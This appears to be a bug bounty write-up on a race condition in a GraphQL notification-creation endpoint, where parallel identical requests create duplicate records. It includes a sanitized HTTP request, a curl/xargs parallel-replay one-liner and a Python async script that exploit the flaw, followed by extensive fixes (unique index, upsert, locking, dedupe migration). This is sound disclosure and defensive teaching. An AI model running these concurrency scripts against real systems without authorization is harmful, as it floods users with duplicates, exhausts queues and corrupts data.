How I Abused a Race Condition to Create Duplicate Notification Records (sanitized)

Author: Satyam Pawale — hackersatty.com
Target (sanitized): vendor.hackersatty.com — Dashboard → Settings → Notifications → Add notification (modal)
Severity: High


About Me

Hey! I’m Satyam Pawale, known as @hackersatty in the bug bounty and ethical hacking world. I started bug hunting in 2024, and ever since, I’ve been obsessed with finding vulnerabilities that most people overlook.

My goal with this blog is to share real-world bug bounty experiences so other hunters can learn the techniques, tools, and mindset required to succeed — while staying ethical and responsible.

This case is about how I abused a race condition in a notification-creation flow to persist duplicate backend records, the kind of concurrency bug that never shows up in single-threaded testing.

Summary

A race condition in the GraphQL CreateNotification flow allows many identical notification records to be created for the same (email, notificationType) pair by sending the same mutation concurrently. The backend performs a non-atomic existence check + insert (or lacks a uniqueness constraint), so parallel requests each succeed and create duplicate rows. Impact includes duplicate emails, queue exhaustion, corrupted metrics, and amplified downstream processing. Fix by enforcing atomic deduplication (DB unique constraint, upsert, or transactional locking) and canonicalizing inputs server-side.


Overview

While testing the notifications feature on a sanitized test instance, I discovered that sending the exact same CreateNotification GraphQL mutation near-simultaneously results in multiple identical notification records. The web UI may include client-side deduplication for UX, but the server accepts every concurrent request and persists a row per request because there is no server-side atomic deduplication or uniqueness enforcement.

All artifacts in this write-up are sanitized: domain names and identifiers use hackersatty.com and no real emails or tokens are included.


Vulnerability

Race condition / missing server-side uniqueness: concurrent CreateNotification GraphQL mutations for the same canonical (email, notificationType) create duplicate database records.


Why this matters

  • Duplicate emails — recipients receive the same notification multiple times (spam, reputational risk).

  • Queue & worker load — duplicate rows trigger duplicate processing and waste resources.

  • Analytics pollution — duplicate rows inflate counts and break metrics.

  • Downstream amplification — exports, reporting, or workflows iterating over rows are multiplied.

  • Highly automatable — a script or proxy tool can reliably create many duplicates.


Best reproduction scenario

Preconditions

  • Valid test account on the portal.

  • Active session cookie or Authorization bearer token (the same session used by the UI).

  • Intercepting proxy or HTTP client that can replay requests concurrently (Burp Repeater, curl with xargs -P, Python aiohttp script, etc.).

  • Testing done only on authorized environments.

Steps

  1. Log into the portal at vendor.hackersatty.com with a test account.

  2. Dashboard → Settings → Notifications → Add notification (open the modal).

  3. Fill notification type (example: ACCOUNT_UPDATES) and a placeholder email (sanitized).

  4. Click Save once — confirm a single entry is created (expected).

  5. Start an intercepting proxy and perform the same Add action again to capture the GraphQL mutation for CreateNotification.

  6. Send the captured POST /graphql request to the proxy’s Repeater (or save the raw request).

  7. Clone the captured request many times (e.g., 5–20 identical copies).

  8. Use Send group (Parallel) in Burp Repeater (or run the copies concurrently via a script) so they hit the server within milliseconds of each other.

  9. Observe: each response returns success (HTTP 200 + GraphQL create payload).

  10. Refresh the Notifications UI — multiple identical notification rows appear for the same (email, notificationType) equal to the number of successful concurrent requests.


Sanitized PoC — Request (GraphQL mutation)

POST /graphql HTTP/2
Host: vendor.hackersatty.com
Content-Type: application/json
Apollographql-Client-Name: vendor-portal
Authorization: Bearer <REDACTED_TOKEN>
Origin: https://vendor.hackersatty.com
Referer: https://vendor.hackersatty.com/dashboard/settings/notifications

{
  "operationName": "CreateNotification",
  "variables": {
    "input": {
      "email": "<REDACTED_EMAIL>",
      "notificationType": "ACCOUNT_UPDATES",
      "accountId": 12345
    }
  },
  "query": "mutation CreateNotification($input: CreateNotificationInput!) { createNotification(input: $input) { accountId notificationType email __typename } }"
}

Sanitized PoC — Typical Response (each concurrent request returns the same success)

HTTP/2 200 OK
Content-Type: application/json

{
  "data": {
    "createNotification": {
      "accountId": "12345",
      "notificationType": "ACCOUNT_UPDATES",
      "email": "<REDACTED_EMAIL>",
      "__typename": "NotificationRecord"
    }
  }
}

Each parallel request returns a created payload and, after refresh, multiple identical notification rows exist in the UI.


Exactly how the race condition happens (technical explanation)

  1. Non-atomic check-then-insert: the server likely performs an "if not exists, then insert" sequence.

  2. Concurrency window: when multiple identical requests arrive simultaneously, each executes the existence check before any concurrent inserts commit; each sees “no existing row” and proceeds to INSERT.

  3. No DB uniqueness constraint: the DB lacks a uniqueness constraint on (canonical_email, notification_type), so all inserts succeed.

  4. Outcome: the application returns “created” for each request; multiple identical records are persisted.

  5. Symptoms: N UI rows for N concurrent requests; duplicated processing downstream.

This is the classic race condition between check and insert under concurrency — the fix is to make creation atomic at the storage layer or to serialize the creation path.
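
To make the window concrete, here is a minimal sketch of that check-then-insert shape (illustrative Python only; db.query_one is a hypothetical helper, and the vendor's real backend code was never visible to me):

# Vulnerable shape (illustrative): the check and the insert are separate
# statements, so two concurrent requests can both pass the check.
def create_notification(db, account_id, email, notification_type):
    existing = db.query_one(
        "SELECT id FROM notifications "
        "WHERE lower(email) = lower($1) AND notification_type = $2",
        [email, notification_type],
    )
    if existing:
        return existing
    # Race window: a second concurrent request can also reach this point,
    # because neither INSERT has committed while the checks run.
    return db.query_one(
        "INSERT INTO notifications (account_id, email, notification_type, created_at) "
        "VALUES ($1, $2, $3, now()) RETURNING *",
        [account_id, email, notification_type],
    )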


Techniques & tools used (methodology)

  • Intercepting proxy: Burp Suite (Proxy + Repeater) with Send group (Parallel).

  • Alternative concurrency methods: curl with xargs -P (see the one-liner after this list), Python aiohttp or threaded requests, wrk/hey.

  • Verification: compare number of created rows in UI to number of concurrent requests; inspect GraphQL responses for created payloads.

  • Sanitization: remove tokens, emails, and PII from stored artifacts.

  • Optional automation: small async script that sends identical POSTs concurrently to reproduce in staging.

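As a concrete example of the curl with xargs -P option above, something like this replays the captured mutation body twenty times in parallel (the JSON file name is illustrative):

seq 20 | xargs -P 20 -I{} curl -s -o /dev/null -w "%{http_code}\n" \
  -X POST "https://vendor.hackersatty.com/graphql" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <REDACTED_TOKEN>" \
  --data @create_notification.json

Each printed line is one response status; on an affected system you would expect all twenty to return 200.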

Concrete fixes (prioritized)

1) Enforce uniqueness at the database layer (recommended)

Create a unique index on canonicalized email + notification_type:

CREATE UNIQUE INDEX CONCURRENTLY idx_notifications_unique_email_type
ON notifications ((lower(email)), notification_type);

This guarantees the storage layer prevents duplicates under concurrent load.

2) Use atomic upsert (ON CONFLICT)

Preferred pattern:

INSERT INTO notifications (account_id, email, notification_type, created_at)
VALUES ($1, lower($2), $3, now())
ON CONFLICT ((lower(email)), notification_type) DO UPDATE
SET updated_at = EXCLUDED.created_at
RETURNING *;

Or use ON CONFLICT DO NOTHING followed by a SELECT of the existing row if you need to return it, as in the sketch below.
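
A minimal sketch of that variant, assuming the same hypothetical db.query_one helper style as the pseudocode later in this post:

# DO NOTHING variant (sketch): the conflict target matches the expression index.
def create_notification(db, account_id, email, notification_type):
    created = db.query_one(
        "INSERT INTO notifications (account_id, email, notification_type, created_at) "
        "VALUES ($1, lower($2), $3, now()) "
        "ON CONFLICT ((lower(email)), notification_type) DO NOTHING "
        "RETURNING *",
        [account_id, email, notification_type],
    )
    if created:
        return created
    # The INSERT was a no-op, so the row already exists; fetch and return it.
    return db.query_one(
        "SELECT * FROM notifications "
        "WHERE lower(email) = lower($1) AND notification_type = $2",
        [email, notification_type],
    )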

3) Server-side canonicalization

Always canonicalize emails server-side (trim + lowercase + unicode normalize) before checks or inserts.

const canonicalEmail = email.normalize("NFC").trim().toLowerCase(); // Unicode-normalize, trim, lowercase

4) Optional: idempotency token

If clients can provide an idempotency key, enforce it server-side to dedupe create attempts. This is most suitable for API clients rather than basic UI clicks.
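
A minimal sketch, assuming a notifications.idempotency_key column backed by its own unique index (both the column and the index are assumptions, not observed schema):

# Idempotency-key sketch: a replay with the same key hits the unique
# index, the INSERT no-ops, and the original row is returned instead.
def create_notification_idempotent(db, account_id, email, notification_type, idem_key):
    row = db.query_one(
        "INSERT INTO notifications (account_id, email, notification_type, idempotency_key) "
        "VALUES ($1, lower($2), $3, $4) "
        "ON CONFLICT (idempotency_key) DO NOTHING RETURNING *",
        [account_id, email, notification_type, idem_key],
    )
    return row or db.query_one(
        "SELECT * FROM notifications WHERE idempotency_key = $1", [idem_key]
    )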

5) Transactional locking / advisory locks

If ON CONFLICT is not available, use transactional serialization or an advisory lock keyed by (account_id, canonical_email, notification_type) to serialize creation. This is less desirable than DB uniqueness + upsert.
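
A minimal sketch of the advisory-lock variant (pg_advisory_xact_lock and hashtext are standard Postgres functions; the db helper and the lock-key format are assumptions):

# Advisory-lock sketch: the transaction-scoped lock is held until
# commit/rollback, so concurrent creates for the same pair serialize.
def create_notification_locked(db, account_id, email, notification_type):
    with db.transaction():
        db.query(
            "SELECT pg_advisory_xact_lock(hashtext($1))",
            [f"{account_id}:{email.strip().lower()}:{notification_type}"],
        )
        existing = db.query_one(
            "SELECT * FROM notifications "
            "WHERE lower(email) = lower($1) AND notification_type = $2",
            [email, notification_type],
        )
        if existing:
            return existing
        return db.query_one(
            "INSERT INTO notifications (account_id, email, notification_type, created_at) "
            "VALUES ($1, lower($2), $3, now()) RETURNING *",
            [account_id, email, notification_type],
        )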


Pseudocode — atomic upsert (preferred)

function createNotification(accountId, email, notificationType):
    email = canonicalize(email)  // trim + lowercase + normalize

    result = db.query(
        `INSERT INTO notifications (account_id, email, notification_type, created_at)
         VALUES ($1, $2, $3, now())
         ON CONFLICT ((lower(email)), notification_type) DO UPDATE
         SET updated_at = now()
         RETURNING *`,
        [accountId, email, notificationType]
    )

    return result


Detection & monitoring recommendations

  • Alert on spikes in notifications creation per account or per email.

  • Instrument unique-violation metrics after adding constraints to detect attempted duplicates.

  • Audit logs: record create attempts, client IPs, and request ids for concurrent patterns.

  • Queue monitoring: track message queue length and worker backlogs triggered by notification rows.


Safe remediation rollout plan

  1. Immediate

    • Canonicalize emails server-side (lowercase + trim).

    • Add rate limits to the create endpoint.

  2. High priority

    • Clean existing duplicates (see dedupe plan below).

    • Create the unique index concurrently and change the create flow to INSERT ... ON CONFLICT.

  3. Post-fix

    • Run dedupe migration in controlled batches and add monitoring.


Dedupe migration (safe approach)

  1. Backup the table.

  2. Identify duplicates:

SELECT lower(email) AS email_norm, notification_type, count(*) AS c
FROM notifications
GROUP BY lower(email), notification_type
HAVING count(*) > 1;

  3. Keep one canonical row (e.g., earliest created_at) and delete others in batches:

WITH ranked AS (
  SELECT id, ROW_NUMBER() OVER (
    PARTITION BY lower(email), notification_type
    ORDER BY created_at ASC
  ) AS rn
  FROM notifications
)
DELETE FROM notifications
WHERE id IN (SELECT id FROM ranked WHERE rn > 1 LIMIT 1000);
-- Postgres DELETE has no LIMIT clause; batch via the subquery and run repeatedly until done.

  4. Validate referential integrity and update dependent tables if necessary. Run in small batches with an audit trail.


Example automated reproduction script (sanitized, Python async)

For authorized testing only — do not run against production without permission.

# async_replay.py (sanitized)
import asyncio
import aiohttp

URL = "https://vendor.hackersatty.com/graphql"
HEADERS = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <REDACTED_TOKEN>",
}
PAYLOAD = {
    "operationName": "CreateNotification",
    "variables": {
        "input": {
            "email": "<REDACTED_EMAIL>",
            "notificationType": "ACCOUNT_UPDATES",
            "accountId": 12345,
        }
    },
    "query": "mutation CreateNotification($input: CreateNotificationInput!) { createNotification(input: $input) { accountId notificationType email } }",
}

async def send_one(session):
    # Fire a single CreateNotification mutation and capture status + body.
    async with session.post(URL, json=PAYLOAD, headers=HEADERS) as resp:
        text = await resp.text()
        return resp.status, text

async def main(n):
    # Launch n identical requests concurrently so they land within the race window.
    async with aiohttp.ClientSession() as session:
        tasks = [send_one(session) for _ in range(n)]
        return await asyncio.gather(*tasks)

if __name__ == "__main__":
    results = asyncio.run(main(10))
    for status, body in results:
        print(status, body[:200])

This script sends 10 concurrent create requests; on an affected system you would see multiple created rows.


Short checklist to verify the fix in staging

  1. Add canonicalization and upsert logic + unique index in a branch.

  2. Run the staging app and attempt the same parallel test (Burp Repeater Send group or the async script).

  3. Confirm only one notification row exists per canonical (email, notificationType) after the concurrent attempts.

  4. Monitor logs and unique-violation metrics; expect zero unhandled constraint errors in normal flow.

  5. Run the dedupe migration if historical duplicates exist and then create the index.
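
For step 2, a small driver over the async script above can double as the staging check (assuming the script is saved as async_replay.py next to it):

# verify_fix.py (sketch): fire 20 concurrent creates, then inspect the table.
import asyncio

from async_replay import main  # the sanitized script above

statuses = [status for status, _ in asyncio.run(main(20))]
print("2xx responses:", sum(200 <= s < 300 for s in statuses))
# After the fix every request may still report success (idempotent upsert),
# but the notifications table must hold exactly ONE row for the tested
# (email, notificationType) pair.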


Summary of Fixes

  1. Enforce uniqueness at the DB layer: create a unique index on canonicalized (lower(email), notification_type).

  2. Make creation atomic: use INSERT ... ON CONFLICT (upsert) or equivalent so concurrent creates cannot produce duplicates.

  3. Canonicalize inputs server-side: trim and lowercase emails and return the existing resource or a clear response when duplicates are attempted.

Final Thoughts

This case is a perfect reminder that even mature applications can overlook concurrency edge cases that don’t show up in regular testing. Client-side validation or simple “check-before-insert” logic might appear sufficient, but when operations run in parallel, the tiniest race window can lead to large-scale data integrity issues.

What made this bug particularly impactful is that it didn’t rely on exotic conditions or privilege escalation — just timing. By coordinating concurrent identical requests, an attacker could manipulate backend logic in ways that normal single-threaded testing would never reveal.

In real-world systems where notifications, transactions, or queue-based processes are triggered by new records, such duplication can have serious downstream effects — from flooding users with redundant messages to distorting analytics or overloading task queues.

Building truly robust APIs requires more than input validation; it demands atomic operations, proper database constraints, and a mindset that anticipates concurrency. Race conditions often hide in plain sight, but once discovered, they offer some of the most valuable lessons for improving backend resilience.

In short, always think in parallel — because your attackers certainly will.
